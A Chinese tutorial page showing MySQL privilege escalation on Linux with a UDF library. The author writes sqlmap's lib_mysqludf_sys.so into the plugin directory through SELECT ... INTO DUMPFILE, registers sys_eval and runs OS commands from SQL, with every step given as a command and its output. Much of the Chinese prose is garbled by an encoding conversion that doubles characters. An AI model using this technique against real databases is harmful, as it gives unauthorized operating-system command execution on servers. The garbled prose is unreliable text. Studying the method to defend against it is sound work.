快捷導(dǎo)航

Linux利用UDF庫(kù)實(shí)現(xiàn)Mysql提權(quán)

更新時(shí)間：2014年07月02日 15:36:09 投稿：hebedich

根據(jù)MySQL函數(shù)族的可擴(kuò)展機(jī)制，意味著用戶可以自己建立包含有自定義函數(shù)的動(dòng)態(tài)庫(kù)來(lái)創(chuàng)建自定義函數(shù)，簡(jiǎn)稱udf

環(huán)境:
os:linux(bt5)

database:mysql

簡(jiǎn)述：
通過(guò)自定義庫(kù)函數(shù)來(lái)實(shí)現(xiàn)執(zhí)行任意的程序，這里只在linux下測(cè)試通過(guò)，具體到windows，所用的dll自然不同。

要求：
在mysql庫(kù)下必須有func表，并且在‑‑skip‑grant‑tables開啟的情況下，UDF會(huì)被禁止；

過(guò)程：得到插件庫(kù)路徑找對(duì)應(yīng)操作系統(tǒng)的udf庫(kù)文件利用udf庫(kù)文件加載函數(shù)并執(zhí)行命令

１，得到插件庫(kù)路徑

mysql> show variables like "%plugin%";
+---------------+-----------------------+
| Variable_name | Value         |
+---------------+-----------------------+
| plugin_dir  | /usr/lib/mysql/plugin |
+---------------+-----------------------+
1 row in set (0.00 sec)

２，找對(duì)應(yīng)操作系統(tǒng)的udf庫(kù)文件
因?yàn)樽约簻y(cè)試，看了下自己系統(tǒng)的版本，64位

root@bt:~# uname -a
Linux bt 3.2.6 #1 SMP Fri Feb 17 10:34:20 EST 2012 x86_64 GNU/Linux

對(duì)于udf文件，在sqlmap工具中自帶就有，只要找對(duì)應(yīng)操作系統(tǒng)的版本即可

root@bt:/pentest/database/sqlmap/udf/mysql# ls
linux windows
root@bt:/pentest/database/sqlmap/udf/mysql/linux# ls
32 64
root@bt:/pentest/database/sqlmap/udf/mysql/linux/64# ls
lib_mysqludf_sys.so

３，利用udf庫(kù)文件加載函數(shù)并執(zhí)行命令
首先要得到udf庫(kù)文件的十六進(jìn)制格式，可在本地通過(guò)

mysql> select hex(load_file('/pentest/database/sqlmap/udf/mysql/linux/64/lib_mysqludf_sys.so')) into outfile '/tmp/udf.txt';
Query OK, 1 row affected (0.04 sec)

因?yàn)槲覝y(cè)試時(shí)，使用自帶賬戶，賬戶名mysql，并不是root,所以插件目錄不可寫，而實(shí)際中，一般udf提權(quán)都是用root權(quán)限啟動(dòng)的mysql程序，故，不存在目錄權(quán)限不足，不能訪問(wèn)的情況。為了繼續(xù)，修改目錄權(quán)限

root@bt:~# chmod 777 /usr/lib/mysql/plugin

數(shù)據(jù)庫(kù)中寫入udf庫(kù)到mysql庫(kù)目錄:

mysql> select unhex('7F454C46020...') into dumpfile '/usr/lib/mysql/plugin/mysqludf.so';
Query OK, 1 row affected (0.04 sec)

查看下這個(gè)udf庫(kù)所支持的函數(shù)

root@bt:~# nm -D /usr/lib/mysql/plugin/mysqludf.so
         w _Jv_RegisterClasses
0000000000201788 A __bss_start
         w __cxa_finalize
         w __gmon_start__
0000000000201788 A _edata
0000000000201798 A _end
0000000000001178 T _fini
0000000000000ba0 T _init
         U fgets
         U fork
         U free
         U getenv
000000000000101a T lib_mysqludf_sys_info
0000000000000da4 T lib_mysqludf_sys_info_deinit
0000000000001047 T lib_mysqludf_sys_info_init
         U malloc
         U mmap
         U pclose
         U popen
         U realloc
         U setenv
         U strcpy
         U strncpy
0000000000000dac T sys_bineval
0000000000000dab T sys_bineval_deinit
0000000000000da8 T sys_bineval_init
0000000000000e46 T sys_eval
0000000000000da7 T sys_eval_deinit
0000000000000f2e T sys_eval_init
0000000000001066 T sys_exec
0000000000000da6 T sys_exec_deinit
0000000000000f57 T sys_exec_init
00000000000010f7 T sys_get
0000000000000da5 T sys_get_deinit
0000000000000fea T sys_get_init
000000000000107a T sys_set
00000000000010e8 T sys_set_deinit
0000000000000f80 T sys_set_init
         U sysconf
         U system
         U waitpid

最后，加載函數(shù)并執(zhí)行：

mysql> create function sys_eval returns string soname "mysqludf.so";
Query OK, 0 rows affected (0.14 sec)
 
mysql> select sys_eval('whoami');
+--------------------+
| sys_eval('whoami') |
+--------------------+
| mysql       |
+--------------------+
1 row in set (0.04 sec)
 
mysql> select * from mysql.func;
+----------+-----+-------------+----------+
| name   | ret | dl     | type   |
+----------+-----+-------------+----------+
| sys_eval |  0 | mysqludf.so | function |
+----------+-----+-------------+----------+
1 row in set

您可能感興趣的文章: